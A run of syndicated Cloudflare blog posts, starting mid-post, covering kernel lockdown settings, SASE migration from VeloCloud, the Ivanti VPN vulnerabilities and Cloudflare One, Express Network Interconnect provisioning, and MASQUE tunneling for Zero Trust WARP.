If you compile your own kernel, you can go one step further and set the initial state of the Lockdown LSM to be more restrictive than none from the start. This is exactly what we did for the Cloudflare production kernel:

ignat@dev:~$ grep LOCK_DOWN /boot/config-6.6.17-cloudflare-2024.2.9
# CONFIG_LOCK_DOWN_KERNEL_FORCE_NONE is not set
CONFIG_LOCK_DOWN_KERNEL_FORCE_INTEGRITY=y
# CONFIG_LOCK_DOWN_KERNEL_FORCE_CONFIDENTIALITY is not set

Conclusion

In this post we reviewed some useful Linux kernel security configuration options we use at Cloudflare. This is only a small subset, and there are many more available and even more are being constantly developed, reviewed, and improved by the Linux kernel community. We hope that this post will shed some light on these security features and that, if you haven’t already, you may consider enabling them in your Linux systems.

Watch on Cloudflare TV

Tune in for more news, announcements and thought-provoking discussions! Don’t miss the full Security Week hub page.

Cloudflare treats SASE anxiety for VeloCloud customers

Post Syndicated from Brian Tokuyoshi original https://blog.cloudflare.com/treating-sase-anxiety


We understand that your VeloCloud deployment may be partial or even complete. You may be experiencing discomfort from SASE anxiety. Symptoms include:

If you’re a VeloCloud customer, we are here to help you with your transition to Magic WAN, with planning, products, and services. You’ve experienced the turbulence, and that’s why we are taking steps to help. First, it’s necessary to illustrate what’s fundamentally wrong with the architecture-by-acquisition model in order to define the right path forward. Second, we document the steps involved in making a transition from VeloCloud to Cloudflare. Third, we offer a helping hand to VeloCloud customers to get their SASE strategies back on track.

Architecture is the key to SASE

Your IT organization must deliver stability across your information systems, because the future of your business depends on the decisions that you make today. You need to make sure that your SASE journey is backed by vendors that you can depend on. Indecisive vendors and unclear strategies rarely inspire confidence, and it’s driving organizations to reconsider their relationship.

It’s not just VeloCloud that’s pivoting. Many vendors are chasing the brass ring to meet the requirement for Single Vendor SASE, and they’re trying to reduce their time to market by acquiring features on their checklist, rather than taking the time to build the right architecture for consistent management and user experience. This has led to rapid consolidation of both startups and larger product stacks, and now we’re seeing many instances of vendors having to rationalize their overlapping product lines. Strange days indeed.

But the thing is, Single Vendor SASE is not a feature checklist game. It’s not like shopping for PC antivirus software, where the most attractive option was the one with the most checkboxes. It doesn’t matter if you acquire a large stack of product acronyms (ZTNA, SD-WAN, SWG, CASB, DLP, and FWaaS, to name but a few) if the results are just as convoluted as the technology they aim to replace.

If organizations are new to SASE, then it can be difficult to know what to look for. However, one clear sign of trouble is taking an SSE designed by one vendor and combining it with SD-WAN from another, because you can’t get a converged platform out of two fundamentally incongruent technologies.

Why SASE Math Doesn’t Work

The conceptual model for SASE typically illustrates two half circles, with one consisting of cloud-delivered networking and the other being cloud-delivered security. With this picture in mind, it’s easy to see how one might think that combining an implementation of cloud-delivered networking (VeloCloud SD-WAN) and an implementation of cloud-delivered security (Symantec Network Protection – SSE) might satisfy the requirements. Does Single Vendor SASE = SD-WAN + SSE?

In practice, networking and network security do not exist in separate universes, but SD-WAN and SSE implementations do, especially when they were designed by different vendors. That’s why the math doesn’t work: even with the requisite SASE functionality, the implementations don’t fit together. SD-WAN is designed for network connectivity between sites over the SD-WAN fabric, whereas SSE largely focuses on enforcing security policy for user-to-application traffic from remote users, or for traffic leaving (rather than traversing) the SD-WAN fabric. Therefore, bringing these two worlds together yields inconsistent security, proxy chains that add latency, or security implemented at the edge rather than in the cloud.

Why Cloudflare is different

At Cloudflare, the basis for our approach to single vendor SASE starts from building a global network designed with private data centers, overprovisioned network and compute capacity, and a private backbone designed to deliver our customer’s traffic to any destination. It’s what we call any-to-any connectivity. It’s not using the public cloud for SASE services, because the public cloud was designed as a destination for traffic rather than being optimized for transit. We are in full control of the design of our data centers and network and we’re obsessed with making it even better every day.

It’s from this network that we deliver networking and security services. Conceptually, we implement a philosophy of composability, where the fundamental network connection between the customer’s site and the Cloudflare data center remains the same across different use cases. In practice, and unlike traditional approaches, it means no downtime for service insertion when you need more functionality — the connection to Cloudflare remains the same. It’s the services and the onboarding of additional destinations that changes as organizations expand their use of Cloudflare.

From the perspective of branch connectivity, use Magic WAN for the connectivity that ties your business together, no matter which way traffic passes. That’s because we don’t treat the directions of your network traffic as independent problems. We solve for consistency by on-ramping all traffic through one of Cloudflare’s 310+ anycasted data centers (whether inbound, outbound, or east-west) for enforcement of security policy. We solve for latency by eliminating the need to forward traffic to a compute location by providing full compute services in every data center. We implement SASE using a light edge / heavy cloud model, with services delivered within the Cloudflare connectivity cloud rather than on-prem.

How to transition from VeloCloud to Cloudflare

Start by contacting us to get a consultation session with our solutions architecture team. Our architects specialize in network modernization and can map your SASE goals across a series of smaller projects. We’ve worked with hundreds of organizations to achieve their SASE goals with the Cloudflare connectivity cloud and can build a plan that your team can execute on.

For product education, join one of our product workshops on Magic WAN to get a deep dive into how it’s built and how it can be rolled out to your locations. Magic WAN uses a light edge, heavy cloud model that has multiple network insertion models (whether a tunnel from an existing device, using our turnkey Magic WAN Connector, or deploying a virtual appliance) which can work in parallel or as a replacement for your branch connectivity needs, thus allowing you to migrate at your pace. Our specialist teams can help you mitigate transitionary hardware and license costs as you phase out VeloCloud and accelerate your rollout of Magic WAN.

The Magic WAN technical engineers have a number of resources to help you build product knowledge as well. This includes reference architectures and quick start guides that address your organization’s connectivity goals, whether that is sizing down your on-prem network in favor of the emerging “coffee shop networking” philosophy, retiring legacy SD-WAN, or fully replacing conventional MPLS.

For services, our customer success teams are ready to support your transition, with services that are tailored specifically for Magic WAN migrations both large and small.

Your next move

Interested in learning more? Contact us to get started, and we’ll help you with your SASE journey: we can show you how to replace VeloCloud with Cloudflare Magic WAN and use our network as an extension of yours.

Eliminate VPN vulnerabilities with Cloudflare One

Post Syndicated from Dan Hall original https://blog.cloudflare.com/eliminate-vpn-vulnerabilities-with-cloudflare-one


On January 19, 2024, the Cybersecurity & Infrastructure Security Agency (CISA) issued Emergency Directive 24-01: Mitigate Ivanti Connect Secure and Ivanti Policy Secure Vulnerabilities. CISA has the authority to issue emergency directives in response to a known or reasonably suspected information security threat, vulnerability, or incident. U.S. Federal agencies are required to comply with these directives.

Federal agencies were directed to apply a mitigation against two recently discovered vulnerabilities; the mitigation was to be applied within three days. Further monitoring by CISA revealed that threat actors were continuing to exploit the vulnerabilities and had developed some workarounds to earlier mitigations and detection methods. On January 31, CISA issued Supplemental Direction V1 to the Emergency Directive instructing agencies to immediately disconnect all instances of Ivanti Connect Secure and Ivanti Policy Secure products from agency networks and perform several actions before bringing the products back into service.

This blog post will explore the threat actor’s tactics, discuss the high-value nature of the targeted products, and show how Cloudflare’s Secure Access Service Edge (SASE) platform protects against such threats.

As a side note and showing the value of layered protections, Cloudflare’s WAF had proactively detected the Ivanti zero-day vulnerabilities and deployed emergency rules to protect Cloudflare customers.

Threat Actor Tactics

Forensic investigations (see the Volexity blog for an excellent write-up) indicate that the attacks began as early as December 2023. Piecing together the evidence shows that the threat actors chained two previously unknown vulnerabilities together to gain access to the Connect Secure and Policy Secure appliances and achieve unauthenticated remote code execution (RCE).

CVE-2023-46805 is an authentication bypass vulnerability in the products’ web components that allows a remote attacker to bypass control checks and gain access to restricted resources. CVE-2024-21887 is a command injection vulnerability in the products’ web components that allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. By chaining the two, a remote attacker could bypass authentication, be treated as an “authenticated” administrator, and then execute arbitrary commands on the appliance.

By exploiting these vulnerabilities, the threat actor had near total control of the appliance. Among other things, the attacker was able to:

  • Harvest credentials from users logging into the VPN service
  • Use these credentials to log into protected systems in search of even more credentials
  • Modify files to enable remote code execution
  • Deploy web shells to a number of web servers
  • Reverse tunnel from the appliance back to their command-and-control server (C2)
  • Avoid detection by disabling logging and clearing existing logs

Little Appliance, Big Risk

This is a serious incident that is exposing customers to significant risk. CISA is justified in issuing their directive, and Ivanti is working hard to mitigate the threat and develop patches for the software on their appliances. But it also serves as another indictment of the legacy “castle-and-moat” security paradigm. In that paradigm, remote users were outside the castle while protected applications and resources remained inside. The moat, consisting of a layer of security appliances, separated the two. The moat, in this case the Ivanti appliance, was responsible for authenticating and authorizing users, and then connecting them to protected applications and resources. Attackers and other bad actors were blocked at the moat.

This incident shows us what happens when a bad actor is able to take control of the moat itself, and the challenges customers face to recover control. Two typical characteristics of vendor-supplied appliances and the legacy security strategy highlight the risks:

  • Administrators have access to the internals of the appliance
  • Authenticated users indiscriminately have access to a wide range of applications and resources on the corporate network, increasing the risk of bad actor lateral movement

A better way: Cloudflare’s SASE platform

Cloudflare One is Cloudflare’s SSE and single-vendor SASE platform. While Cloudflare One spans broadly across security and networking services (and you can read about the latest additions here), I want to focus on the two points noted above.

First, Cloudflare One employs the principles of Zero Trust, including the principle of least privilege. As such, users that authenticate successfully only have access to the resources and applications necessary for their role. This principle also helps in the event of a compromised user account as the bad actor does not have indiscriminate network-level access. Rather, least privilege limits the range of lateral movement that a bad actor has, effectively reducing the blast radius.

Second, while customer administrators need to have access to configure their services and policies, Cloudflare One does not provide any external access to the system internals of Cloudflare’s platform. Without that access, a bad actor would not be able to launch the types of attacks executed when they had access to the internals of the Ivanti appliance.  

It’s time to eliminate the legacy VPN

If your organization is impacted by the CISA directive, or you are just ready to modernize and want to augment or replace your current VPN solution, Cloudflare is here to help. Cloudflare’s Zero Trust Network Access (ZTNA) service, part of the Cloudflare One platform, is the fastest and safest way to connect any user to any application.

Contact us to get immediate onboarding help or to schedule an architecture workshop to help you augment or replace your Ivanti (or any) VPN solution.
Not quite ready for a live conversation? Read our learning path article on how to replace your VPN with Cloudflare or our SASE reference architecture for a view of how all of our SASE services and on-ramps work together.

Simplifying how enterprises connect to Cloudflare with Express Cloudflare Network Interconnect

Post Syndicated from Ben Ritter original https://blog.cloudflare.com/announcing-express-cni


We’re excited to announce the largest update to Cloudflare Network Interconnect (CNI) since its launch, and because we’re making CNIs faster and easier to deploy, we’re calling this Express CNI. At the most basic level, CNI is a cable between a customer’s network router and Cloudflare, which facilitates the direct exchange of information between networks instead of via the Internet. CNIs are fast, secure, and reliable, and have connected customer networks directly to Cloudflare for years. We’ve been listening to how we can improve the CNI experience, and today we are sharing more information about how we’re making it faster and easier to order CNIs, and connect them to Magic Transit and Magic WAN.

Interconnection services and what to consider

Interconnection services provide a private connection that allows you to connect your networks to other networks like the Internet, cloud service providers, and other businesses directly. This private connection benefits from improved connectivity versus going over the Internet and reduced exposure to common threats like Distributed Denial of Service (DDoS) attacks.

Cost is an important consideration when evaluating any vendor for interconnection services. The cost of an interconnection typically consists of a fixed port fee, based on the capacity (speed) of the port, and a variable charge for the amount of data transferred. Some cloud providers also add complex inter-region bandwidth charges.

Other important considerations include the following:

  • How much capacity is needed?
  • Are there variable or fixed costs associated with the port?
  • Is the provider located in the same colocation facility as my business?
  • Are they able to scale with my network infrastructure?
  • Are you able to predict your costs without any unwanted surprises?
  • What additional products and services does the vendor offer?

Cloudflare does not charge a port fee for Cloudflare Network Interconnect, nor do we charge for inter-region bandwidth. Using CNI with products like Magic Transit and Magic WAN may even reduce bandwidth spending with Internet service providers. For example, you can deliver Magic Transit-cleaned traffic to your data center with a CNI instead of via your Internet connection, reducing the amount of bandwidth that you would pay an Internet service provider for.

To underscore the value of CNI, one vendor charges nearly $20,000 a year for a 10 Gigabit per second (Gbps) direct connect port. The same 10 Gbps CNI on Cloudflare for one year is $0. And their cost does not even include the charges for data transferred between different regions or geographies, or outside of their cloud. We have never charged for CNIs, and are committed to making it even easier for customers to connect to Cloudflare, and to destinations beyond on the open Internet.

3 Minute Provisioning

Our first big announcement is a new, faster approach to CNI provisioning and deployment. Starting today, all Magic Transit and Magic WAN customers can order CNIs directly from their Cloudflare account. The entire process is about 3 clicks and takes less than 3 minutes (roughly the time to make coffee). We’re going to show you how simple it is to order a CNI.

The first step is to find out whether Cloudflare is in the same data center or colocation facility as your routers, servers, and network hardware. Let’s navigate to the new “Interconnects” section of the Cloudflare dashboard, and order a new Direct CNI.

Search for the city of your data center, and quickly find out if Cloudflare is in the same facility. I’m going to stand up a CNI to connect my example network located in Ashburn, VA.

It looks like Cloudflare is in the same facility as my network, so I’m going to select the location where I’d like to connect.

As of right now, my data center is only exchanging a few hundred Megabits per second of traffic on Magic Transit, so I’m going to select a 1 Gigabit per second interface, which is the smallest port speed available. I can also order a 10 Gbps link if I have more than 1 Gbps of traffic in a single location. Cloudflare also supports 100 Gbps CNIs, but if you have this much traffic to exchange with us, we recommend that you coordinate with your account team.

After selecting your preferred port speed, you can name your CNI, which will be referenceable later when you direct your Magic Transit or Magic WAN traffic to the interconnect. We are given the opportunity to verify that everything looks correct before confirming our CNI order.

Once we click the “Confirm Order” button, Cloudflare will provision an interface on our router for your CNI, and also assign IP addresses for you to configure on your router interface. Cloudflare will also issue you a Letter of Authorization (LOA) for you to order a cross connect with the local facility. Cloudflare will provision a port on our router for your CNI within 3 minutes of your order, and you will be able to ping across the CNI as soon as the interface line status comes up.

After downloading the Letter of Authorization (LOA) to order a cross connect, we’ll navigate back to our Interconnects area. Here we can see the point to point IP addressing, and the CNI name that is used in our Magic Transit or Magic WAN configuration. We can also redownload the LOA if needed.

Simplified Magic Transit and Magic WAN onboarding

Our second major announcement is that Express CNI dramatically simplifies how Magic Transit and Magic WAN customers connect to Cloudflare. Getting packets into Magic Transit or Magic WAN in the past with a CNI required customers to configure a GRE (Generic Routing Encapsulation) tunnel on their router. These configurations are complex, and not all routers and switches support these changes. Since both Magic Transit and Magic WAN protect networks, and operate at the network layer on packets, customers rightly asked us, “If I connect directly to Cloudflare with CNI, why do I also need a GRE tunnel for Magic Transit and Magic WAN?”

Starting today, GRE tunnels are no longer required with Express CNI. This means that Cloudflare supports standard 1500-byte packets on the CNI, and there’s no need for complex GRE or MSS adjustment configurations to get traffic into Magic Transit or Magic WAN. This significantly reduces the amount of configuration required on a router for Magic Transit and Magic WAN customers who can connect over Express CNI. If you’re not familiar with Magic Transit, the key takeaway is that we’ve reduced the complexity of changes you must make on your router to protect your network with Cloudflare.

What’s next for CNI?

We’re excited about how Express CNI simplifies connecting to Cloudflare’s network. Some customers connect to Cloudflare through our Interconnection Platform Partners, like Equinix and Megaport, and we plan to bring the Express CNI features to our partners too.

We have upgraded a number of our data centers to support Express CNI, and plan to upgrade many more over the next few months. We are rapidly expanding the number of global locations that support Express CNI as we install new network hardware. If you’re interested in connecting to Cloudflare with Express CNI, but are unable to find your data center, please let your account team know.

If you’re on an existing classic CNI today, and you don’t need Express CNI features, there is no obligation to migrate to Express CNI. Magic Transit and Magic WAN customers have been asking for BGP support to control how Cloudflare routes traffic back to their networks, and we expect to extend BGP support to Express CNI first, so keep an eye out for more Express CNI announcements later this year.

Get started with Express CNI today

As we’ve demonstrated above, Express CNI makes it fast and easy to connect your network to Cloudflare. If you’re a Magic Transit or Magic WAN customer, the new “Interconnects” area is now available on your Cloudflare dashboard. To deploy your first CNI, you can follow along with the screenshots above, or refer to our updated interconnects documentation.

Zero Trust WARP: tunneling with a MASQUE

Post Syndicated from Dan Hall original https://blog.cloudflare.com/zero-trust-warp-with-a-masque


Slipping on the MASQUE

In June 2023, we told you that we were building a new protocol, MASQUE, into WARP. MASQUE is a fascinating protocol that extends the capabilities of HTTP/3 and leverages the unique properties of the QUIC transport protocol to efficiently proxy IP and UDP traffic without sacrificing performance or privacy.

At the same time, we’ve seen a rising demand from Zero Trust customers for features and solutions that only MASQUE can deliver. All customers want WARP traffic to look like HTTPS to avoid detection and blocking by firewalls, while a significant number of customers also require FIPS-compliant encryption. We have something good here, and it’s been proven elsewhere (more on that below), so we are building MASQUE into Zero Trust WARP and will be making it available to all of our Zero Trust customers — at WARP speed!

This blog post highlights some of the key benefits our Cloudflare One customers will realize with MASQUE.

Before the MASQUE

Cloudflare is on a mission to help build a better Internet. And it is a journey we’ve been on with our device client and WARP for almost five years. The precursor to WARP was the 2018 launch of 1.1.1.1, the Internet’s fastest, privacy-first consumer DNS service. WARP was introduced in 2019 with the announcement of the 1.1.1.1 service with WARP, a high performance and secure consumer DNS and VPN solution. Then in 2020, we introduced Cloudflare’s Zero Trust platform and the Zero Trust version of WARP to help any IT organization secure their environment, featuring a suite of tools we first built to protect our own IT systems. Zero Trust WARP with MASQUE is the next step in our journey.

The current state of WireGuard

WireGuard was the perfect choice for the 1.1.1.1 with WARP service in 2019. WireGuard is fast, simple, and secure. It was exactly what we needed at the time to guarantee our users’ privacy, and it has met all of our expectations. If we went back in time to do it all over again, we would make the same choice.

But the other side of the simplicity coin is a certain rigidity. We find ourselves wanting to extend WireGuard to deliver more capabilities to our Zero Trust customers, but WireGuard is not easily extended. Capabilities such as better session management, advanced congestion control, or simply the ability to use FIPS-compliant cipher suites are not options within WireGuard; these capabilities would have to be added as proprietary extensions, if that were even possible.

Plus, while WireGuard is popular in VPN solutions, it is not standards-based, and therefore not treated like a first class citizen in the world of the Internet, where non-standard traffic can be blocked, sometimes intentionally, sometimes not. WireGuard uses a non-standard port, port 51820, by default. Zero Trust WARP changes this to use port 2408 for the WireGuard tunnel, but it’s still a non-standard port. For our customers who control their own firewalls, this is not an issue; they simply allow that traffic. But many of the large number of public Wi-Fi locations, or the approximately 7,000 ISPs in the world, don’t know anything about WireGuard and block these ports. We’ve also faced situations where the ISP does know what WireGuard is and blocks it intentionally.

This can play havoc for roaming Zero Trust WARP users at their local coffee shop, in hotels, on planes, or other places where there are captive portals or public Wi-Fi access, and even sometimes with their local ISP. The user is expecting reliable access with Zero Trust WARP, and is frustrated when their device is blocked from connecting to Cloudflare’s global network.

Now we have another proven technology — MASQUE — which uses and extends HTTP/3 and QUIC. Let’s do a quick review of these to better understand why Cloudflare believes MASQUE is the future.

Unpacking the acronyms

HTTP/3 and QUIC are among the most recent advancements in the evolution of the Internet, enabling faster, more reliable, and more secure connections to endpoints like websites and APIs. Cloudflare worked closely with industry peers through the Internet Engineering Task Force on the development of RFC 9000 for QUIC and RFC 9114 for HTTP/3. The technical background on the basic benefits of HTTP/3 and QUIC are reviewed in our 2019 blog post where we announced QUIC and HTTP/3 availability on Cloudflare’s global network.

Most relevant for Zero Trust WARP, QUIC delivers better performance on high-latency or lossy networks, thanks to packet coalescing and multiplexing. QUIC packets from separate contexts during the handshake can be coalesced into the same UDP datagram, reducing the number of receive operations and system interrupts. With multiplexing, QUIC can carry multiple HTTP sessions over a single QUIC connection on one UDP flow. Zero Trust WARP also benefits from QUIC's high level of privacy, with TLS 1.3 designed into the protocol.
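To make the plumbing concrete, here is a minimal sketch of a QUIC client built with quiche, Cloudflare's open source QUIC implementation. The peer address, connection ID, and ALPN value are placeholders, the event loop is elided, and the API shown reflects recent quiche releases, so treat it as an illustration rather than production code:

```rust
use std::net::UdpSocket;

fn main() -> Result<(), Box<dyn std::error::Error>> {
    // A single UDP socket carries the entire QUIC connection.
    let socket = UdpSocket::bind("0.0.0.0:0")?;
    let peer = "203.0.113.10:443".parse()?; // placeholder address

    // TLS 1.3 is built into the QUIC handshake; ALPN advertises HTTP/3.
    let mut config = quiche::Config::new(quiche::PROTOCOL_VERSION)?;
    config.set_application_protos(&[b"h3"])?;

    let scid = quiche::ConnectionId::from_ref(&[0xba; 16]); // placeholder CID
    let mut conn =
        quiche::connect(Some("example.com"), &scid, socket.local_addr()?, peer, &mut config)?;

    // quiche builds the outgoing datagrams; handshake packets from
    // separate contexts may be coalesced into a single datagram here.
    let mut out = [0u8; 1350];
    let (write, send_info) = conn.send(&mut out)?;
    socket.send_to(&out[..write], send_info.to)?;

    // ... event loop elided: feed received datagrams to conn.recv() and
    // flush conn.send() until the handshake completes ...

    if conn.is_established() {
        // Multiplexing: independent streams share one connection, so a
        // lost packet on one stream does not stall the others.
        conn.stream_send(0, b"request A", true)?;
        conn.stream_send(4, b"request B", true)?;
    }
    Ok(())
}
```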

MASQUE unlocks QUIC’s potential for proxying by providing the application layer building blocks to support efficient tunneling of TCP and UDP traffic. In Zero Trust WARP, MASQUE will be used to establish a tunnel over HTTP/3, delivering the same capability as WireGuard tunneling does today. In the future, we’ll be in position to add more value using MASQUE, leveraging Cloudflare’s ongoing participation in the MASQUE Working Group. This blog post is a good read for those interested in digging deeper into MASQUE.

OK, so Cloudflare is going to use MASQUE for WARP. What does that mean to you, the Zero Trust customer?

Proven reliability at scale

Cloudflare’s network today spans more than 310 cities in over 120 countries, and interconnects with over 13,000 networks globally. HTTP/3 and QUIC were introduced to the Cloudflare network in 2019, the HTTP/3 standard was finalized in 2022, and represented about 30% of all HTTP traffic on our network in 2023.

We also use MASQUE for iCloud Private Relay and other Privacy Proxy partners. The services that power these partnerships, from our Rust-based proxy framework to our open source QUIC implementation, are already deployed globally in our network and have proven to be fast, resilient, and reliable.

Cloudflare is already operating MASQUE, HTTP/3, and QUIC reliably at scale. So we want you, our Zero Trust WARP users and Cloudflare One customers, to benefit from that same reliability and scale.

Connect from anywhere

Employees need to be able to connect from anywhere that has an Internet connection. That can be a challenge, because many security engineers configure firewalls and other network devices to block all ports by default, opening only the most well-known and commonly used ones. As we pointed out earlier, this is frustrating for the roaming Zero Trust WARP user.

We want to fix that for our users and remove that frustration. HTTP/3 and QUIC deliver the perfect solution. QUIC is carried on top of UDP (IP protocol 17), and HTTP/3 over QUIC uses UDP port 443, the same port as HTTPS. Both are well known, widely used, and very unlikely to be blocked.
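As an illustration (pseudo-rules, not a real configuration), the egress policy on a locked-down guest network often amounts to something like this:

```
allow udp dport 53       # DNS
allow tcp dport 80       # HTTP
allow tcp dport 443      # HTTPS
allow udp dport 443      # QUIC / HTTP/3, where the MASQUE tunnel rides
deny  all other traffic  # including WireGuard on udp/2408
```

A Zero Trust WARP tunnel that looks like ordinary HTTP/3 on UDP port 443 passes through such a policy; a WireGuard tunnel on a non-standard port does not.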

We want our Zero Trust WARP users to reliably connect wherever they might be.

Compliant cipher suites

MASQUE leverages TLS 1.3 with QUIC, which provides a number of cipher suite choices. WireGuard also uses well-regarded, standardized cryptography, albeit a fixed set with no ability to negotiate alternatives. But some standards are more, let's say, standard than others.

NIST, the National Institute of Standards and Technology, part of the US Department of Commerce, does a tremendous amount of work across the technology landscape. Of interest to us is the NIST work on cryptography and network security that results in FIPS 140-2 and similar publications. NIST studies individual cipher suites and publishes lists of those it recommends for use, recommendations that become requirements for US Government entities. Many other organizations, both government and commercial, adopt the same recommendations as requirements.

Our first MASQUE implementation for Zero Trust WARP will use TLS 1.3 and FIPS-compliant cipher suites.
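For illustration, here is how the TLS 1.3 cipher suites commonly negotiated with QUIC line up against the NIST recommendations (a simplified summary, not an official list):

```
TLS_AES_128_GCM_SHA256         FIPS-approved algorithms (AES-GCM, SHA-256)
TLS_AES_256_GCM_SHA384         FIPS-approved algorithms (AES-GCM, SHA-384)
TLS_CHACHA20_POLY1305_SHA256   not FIPS-approved (ChaCha20-Poly1305)
```

A FIPS-compliant deployment simply restricts the handshake to the AES-GCM suites.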

How can I get Zero Trust WARP with MASQUE?

Cloudflare engineers are hard at work implementing MASQUE for the mobile apps, the desktop clients, and the Cloudflare network. Progress has been good, and we will open this up for beta testing early in the second quarter of 2024 for Cloudflare One customers. Your account team will be reaching out with participation details.

Continuing the journey with Zero Trust WARP

Cloudflare launched WARP five years ago, and we’ve come a long way since. This introduction of MASQUE to Zero Trust WARP is a big step, one that will immediately deliver the benefits noted above. But there will be more — we believe MASQUE opens up new opportunities to leverage the capabilities of QUIC and HTTP/3 to build innovative Zero Trust solutions. And we’re also continuing to work on other new capabilities for our Zero Trust customers.
Cloudflare is committed to continuing our mission to help build a better Internet, one that is more private and secure, scalable, reliable, and fast. And if you would like to join us in this exciting journey, check out our open positions.